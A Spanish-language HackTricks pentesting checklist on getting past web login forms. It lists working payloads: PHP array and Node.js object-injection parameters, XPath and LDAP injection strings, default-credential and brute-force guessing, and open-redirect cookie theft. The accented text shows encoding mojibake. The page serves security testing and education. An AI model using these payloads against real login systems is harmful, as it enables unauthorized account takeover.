Login Bypass
Reading time: 4 minutes
tip
Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripci贸n!
- 脷nete al 馃挰 grupo de Discord o al grupo de telegram o s铆guenos en Twitter 馃惁 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a HackTricks y HackTricks Cloud repos de github.
Bypass de inicio de sesi贸n regular
Si encuentras una p谩gina de inicio de sesi贸n, aqu铆 puedes encontrar algunas t茅cnicas para intentar eludirla:
- Verifica los comentarios dentro de la p谩gina (驴desplazarte hacia abajo y a la derecha?)
- Verifica si puedes acceder directamente a las p谩ginas restringidas
- Verifica no enviar los par谩metros (no env铆es ninguno o solo 1)
- Verifica el error de comparaciones de PHP:
user[]=a&pwd=b
,user=a&pwd[]=b
,user[]=a&pwd[]=b
- Cambia el tipo de contenido a json y env铆a valores json (incluido bool true)
- Si recibes una respuesta diciendo que POST no es compatible, puedes intentar enviar el JSON en el cuerpo pero con una solicitud GET con
Content-Type: application/json
- Verifica el posible error de an谩lisis de nodejs (lee esto):
password[password]=1
- Nodejs transformar谩 esa carga 煤til a una consulta similar a la siguiente:
SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``
password=password=1
;
lo que hace que el bit de la contrase帽a sea siempre verdadero. - Si puedes enviar un objeto JSON, puedes enviar
"password":{"password": 1}
para eludir el inicio de sesi贸n. - Recuerda que para eludir este inicio de sesi贸n a煤n necesitas conocer y enviar un nombre de usuario v谩lido.
- Agregar la opci贸n
"stringifyObjects":true
al llamar amysql.createConnection
eventualmente bloquear谩 todos los comportamientos inesperados cuando se paseObject
en el par谩metro. - Verifica las credenciales:
- Credenciales predeterminadas de la tecnolog铆a/plataforma utilizada
- Combinaciones comunes (root, admin, password, nombre de la tecnolog铆a, usuario predeterminado con alguna de estas contrase帽as).
- Crea un diccionario usando Cewl, agrega el nombre de usuario y la contrase帽a predeterminados (si los hay) y trata de forzarlo usando todas las palabras como nombres de usuario y contrase帽as
- Fuerza bruta usando un diccionario m谩s grande (Fuerza bruta)
Bypass de autenticaci贸n por inyecci贸n SQL
Aqu铆 puedes encontrar varios trucos para eludir el inicio de sesi贸n a trav茅s de inyecciones SQL.
En la siguiente p谩gina puedes encontrar una lista personalizada para intentar eludir el inicio de sesi贸n a trav茅s de inyecciones SQL:
{{#ref}} sql-login-bypass.md {{#endref}}
Bypass de autenticaci贸n sin inyecci贸n SQL
Aqu铆 puedes encontrar varios trucos para eludir el inicio de sesi贸n a trav茅s de No SQL Injections.
Dado que las inyecciones NoSQL requieren cambiar el valor de los par谩metros, necesitar谩s probarlas manualmente.
Bypass de autenticaci贸n por inyecci贸n XPath
Aqu铆 puedes encontrar varios trucos para eludir el inicio de sesi贸n a trav茅s de inyecci贸n XPath.
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
LDAP Injection autenticaci贸n bypass
Aqu铆 puedes encontrar varios trucos para eludir el inicio de sesi贸n a trav茅s de LDAP Injection.
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
Recuerdame
Si la p谩gina tiene funcionalidad de "Recuerdame", verifica c贸mo est谩 implementada y ve si puedes abusar de ella para tomar el control de otras cuentas.
Redirecciones
Las p谩ginas generalmente redirigen a los usuarios despu茅s de iniciar sesi贸n, verifica si puedes alterar esa redirecci贸n para causar un Open Redirect. Tal vez puedas robar alguna informaci贸n (c贸digos, cookies...) si rediriges al usuario a tu web.
Otras Comprobaciones
- Verifica si puedes enumerar nombres de usuario abusando de la funcionalidad de inicio de sesi贸n.
- Verifica si autocompletar est谩 activo en los formularios de contrase帽a/informaci贸n sensible input:
<input autocomplete="false">
Herramientas Autom谩ticas
tip
Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripci贸n!
- 脷nete al 馃挰 grupo de Discord o al grupo de telegram o s铆guenos en Twitter 馃惁 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a HackTricks y HackTricks Cloud repos de github.